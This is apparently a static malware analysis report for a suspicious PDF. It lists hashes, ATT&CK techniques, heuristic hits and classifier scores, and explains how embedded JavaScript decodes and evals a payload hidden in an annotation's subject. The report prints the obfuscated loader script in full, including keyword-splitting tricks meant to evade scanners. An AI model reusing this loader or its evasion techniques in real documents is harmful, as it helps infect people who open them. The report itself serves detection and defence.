PDF static analysis report

Static analysis result for SHA-256 6e65233b29f49580…

SUSPICIOUS

PDF

Size: 37.8 KB
Created: 2010-04-14 00:21:26 +04:00
Authoring application: TCPDF (producer string: TCPDF 4.8.032 (http://www.tcpdf.org))
First seen: 2026-05-10
MD5: 875b2c03d4ae87f265bb8555abb8c5b5
SHA-1: 61e92efb63199b96ab1d5bb04ff9d756d786f9f0
SHA-256: 6e65233b29f49580645505fd15e2ea6bb92e815a6bdab87c3bcb339215129511
Risk score: 56

Malware Insights

MITRE ATT&CK
  • T1059.007 JavaScript
  • T1566.001 Spearphishing Attachment

The PDF embeds JavaScript (object 10) that is obfuscated with randomly generated identifier names, string concatenation and character-code arithmetic. The script carries no payload of its own: it calls `this.getAnnot(0, "0001-0004")` to fetch the annotation named "0001-0004" on the first page, reads that annotation's `subject` string, rewrites every non-digit character as a `;` separator, splits the result into numeric tokens, subtracts 237 from each token and rebuilds the text with `String.fromCharCode`. The decoded string is then passed to `eval` through `app.setTimeOut` after a 100 ms delay; both `setTimeOut` and `eval` are assembled from fragments (`'set'+'TimeO'+'u'+'t'`, `"ev"+"a"+"l"`) so that a keyword scan of the /JS stream does not see them. Keeping the real payload in an annotation's /Subject keeps the /JS stream small and free of suspicious strings, and is a pattern commonly used to stage a second-stage script that downloads and executes further code. The annotation itself was not carved as an artifact, so the second stage is not recovered in this report. The ML classifier also flagged this PDF as malicious with high confidence.

Machine Learning

  • Nyx PDF Classifier: malicious, score 0.9999

Heuristics 4

  • JavaScript action (severity: low; rule PDF_JAVASCRIPT; 1 related finding)
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream (severity: low; rule PDF_JS)
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Optional Content Group with action trigger (severity: low; rule PDF_OPTIONAL_CONTENT)
    An Optional Content Group (layer) co-occurs with an action trigger: content can be selectively hidden from viewers or scanners while the action still fires on open.
  • Suspicious extracted artifact (severity: info; rule EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0010_000.js | pdf-javascript-stream | PDF /JS object 10 at offset 0x8CDA | 1346 bytes
SHA-256: 4f4032a2182b874f3b1232f2f4b72c085ae0e07605dea9074b0b6fe9b9735275
Preview script
First 1,000 lines of the extracted script (the stream is UTF-16LE with a byte-order mark; shown here decoded to plain text):
var BkGbxZlFz = 237;
var B3FhhEBz = this.getAnnot(0, "0001-0004");
if( B3FhhEBz != null) {
    A9jyJe8 = B3FhhEBz.subject;
}
A9jyJe8 = A9jyJe8.replace(/[^0-9]/g,';');
A9jyJe8 = A9jyJe8.replace(/;;/g,'');
function R0LWMZ2jbI2g ( W2gnJiUezsgV, gi4bTBD7aBQr ) {
var hXs4s = new String();var rnwRkPMB5i = new String();
FDRoX = W2gnJiUezsgV .split(';');
for(vvXqC0ol = 0; vvXqC0ol < FDRoX.length-1;vvXqC0ol++) {
P4lwbezT= String['from'+'Char'+'Code'](FDRoX[vvXqC0ol] - gi4bTBD7aBQr);
rnwRkPMB5i = rnwRkPMB5i + P4lwbezT;} return rnwRkPMB5i;};
vnQkXp8i = R0LWMZ2jbI2g(A9jyJe8,BkGbxZlFz);
var t = 'a';
var d = 'u';
libbb =  app['set'+'TimeO' + d +'t']("ev"+t+"l(vnQkXp8i)", 100);
stream_001_off00008cda.bin | decompressed-pdf-stream | PDF FlateDecoded stream at offset 0x8CDA | 672 bytes
SHA-256: 8f98b621fb93e8c8b0eac8b0b27f9668536e5f68be52b3e5738ae14120777987
Detection
  • ClamAV: No threats found
  • Obfuscation or payload: likely
    9 of 17 identifiers look randomly generated (e.g. 'gi4bTBD7aBQr'); 2 string-concatenation chains, consistent with name-mangling obfuscation.